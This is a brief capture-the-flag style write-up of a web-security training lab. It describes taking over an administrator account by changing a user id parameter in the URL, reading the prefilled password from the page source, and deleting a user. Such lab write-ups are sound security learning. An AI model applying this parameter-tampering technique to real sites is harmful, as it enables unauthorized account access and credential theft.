User ID controlled by request parameter with password disclosure

This lab has user account page that contains the current user's existing password, prefilled in a masked input.

After logging in as "wiener," I observed that my account was linked to an ID in the URL:

https://0a1900cc04e26758802e8fea00510024.web-security-academy.net/my-account?id=wiener

Subsequently, I effortlessly modified the ID to "administrator," gaining access to the administrator's account page. A quick inspection of the page's source code revealed the administrator's password. With these newfound credentials, I logged in and successfully deleted the "carlos" user, ultimately resolving the lab.